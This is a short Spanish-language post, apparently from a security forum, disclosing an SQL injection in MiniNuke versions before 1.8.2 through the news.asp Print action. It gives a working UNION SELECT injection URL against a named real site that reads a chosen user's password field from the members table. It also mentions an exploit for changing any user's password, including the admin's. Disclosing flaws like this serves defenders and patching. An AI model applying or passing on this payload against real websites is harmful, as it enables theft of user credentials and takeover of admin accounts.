MiniNuke 1.8.2 SQL inyection

Se ha descubierto una vulnerabilidad en sistema MiniNuke versiones anteriores a 1.8.2, por el cual con una inyeccion SQL se puede ver todos los datos de cualquier usuario,incluso cambiar el password del admin, etc...
La inyeccion se realiza en el archivo news.asp:


GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]


http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52


Exploit para cambiar el password de cualquier usuario AQUI

Salu2